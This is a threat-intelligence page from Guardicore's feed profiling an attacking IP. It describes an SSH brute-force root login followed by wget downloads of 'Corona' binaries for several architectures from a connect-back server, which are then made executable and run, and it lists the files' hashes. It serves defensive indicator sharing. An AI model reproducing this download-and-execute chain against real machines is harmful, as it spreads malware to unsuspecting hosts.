IP Address: 51.159.7.65Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
51.159.7.65​
Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

SSH

Tags

Successful SSH Login HTTP SSH Brute Force Outgoing Connection Download File Download Operation SSH Listening Download and Allow Execution Download and Execute

Connect Back Servers

91.209.70.174

Basic Information

IP Address

51.159.7.65

Domain

-

ISP

-

Country

United Kingdom of Great Britain and Northern Ireland

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2019-10-29

Last seen in Guardicore Centra

2019-10-29

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using SSH with the following credentials: root / ******* - Authentication policy: White List (Part of a Brute Force Attempt)

Successful SSH Login SSH Brute Force

A possibly malicious Download Operation was detected

Download Operation

Process /usr/bin/wget generated outgoing network traffic to: 91.209.70.174:80 6 times

Outgoing Connection

The file /tmp/Corona.sh was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/Corona.mips was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/Corona.mipsel was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/Corona.sh4 was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/Corona.x86_64 was downloaded and granted execution privileges

Download and Allow Execution

Process /tmp/gewa started listening on ports: 4939 2 times

Listening

The file /tmp/gewa was downloaded and executed 2 times

Download and Execute

The file /tmp/Corona.arm6 was downloaded and granted execution privileges

Download and Allow Execution

Connection was closed due to timeout

Associated Files

/tmp/Corona.mips

SHA256: 7b126aa7eeccd81b7e69d58ec6b43333321d5be97ed208338630a51d469cf150

83,543 bytes

/tmp/Corona.sh

SHA256: fae1c9a6cafcdf299f86a78ffed4e371b82b05b3f09eb933d866ab3244d0c704

1,814 bytes

/tmp/Corona.x86_64

SHA256: e3e329150fd238bd751611d780d44883969cc7ed70a03fad81d1a727e20c4360

65,447 bytes

/tmp/gewa

SHA256: e3e329150fd238bd751611d780d44883969cc7ed70a03fad81d1a727e20c4360

65,447 bytes

/tmp/Corona.arm6

SHA256: f5e5f84bf42ae26e73e8ff2dece52c9f7b9ab4b8b9301463ca0bcb6a5ba3c488

92,958 bytes

/tmp/Corona.sh4

SHA256: 2e7511928c2954b7d4b6e2646a95eec9bac0fabfb367037e59d082e403f30987

60,034 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 51.159.7.65​Malicious